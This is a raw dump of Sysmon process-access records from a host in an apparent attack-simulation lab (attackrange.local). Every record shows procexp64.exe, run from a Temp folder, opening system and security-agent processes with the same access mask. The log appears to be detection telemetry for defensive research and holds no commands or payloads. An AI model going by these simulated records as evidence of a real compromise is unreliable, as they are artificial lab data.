15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 